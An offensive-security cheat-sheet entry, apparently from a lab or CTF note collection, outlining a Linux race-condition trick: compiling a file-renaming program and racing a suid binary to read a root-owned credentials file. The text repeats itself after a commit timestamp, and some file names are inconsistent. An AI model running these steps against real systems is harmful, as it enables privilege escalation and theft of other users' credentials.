killchain-compendium/exploit/linux/racing_conditions.md

# Racing Conditions

## Read files from another user

* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
* The file of intereset is called `root_credentials` and is owned by root
* Create a file 
```sh
touch yo
```
* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
```sh
gcc gistfile.c -o rename_file
```
* Inside session 1 start the binary
```sh
./rename_file yo root_credentials
```
* Inside session to try to read `root_credentials` until it succeeds
```sh
./read_creds root_credentials
```
bump 2022-01-21 21:54:15 +01:00			`# Racing Conditions`

			`## Read files from another user`

			* The file of interest needs to be opened by a process which is a suid binary (here named `read_reds`) and creates a file descriptor to it
			* The file of intereset is called `root_credentials` and is owned by root
			`* Create a file`
			```sh
			`touch yo`
			```
			* Compile `gistfile.txt` from [live overflow's repo](https://gist.github.com/LiveOverflow/590edaf5cf3adeea31c73e303692dec0)
			```sh
			`gcc gistfile.c -o rename_file`
			```
			`* Inside session 1 start the binary`
			```sh
			`./rename_file yo root_credentials`
			```
			* Inside session to try to read `root_credentials` until it succeeds
			```sh
			`./read_creds root_credentials`
			```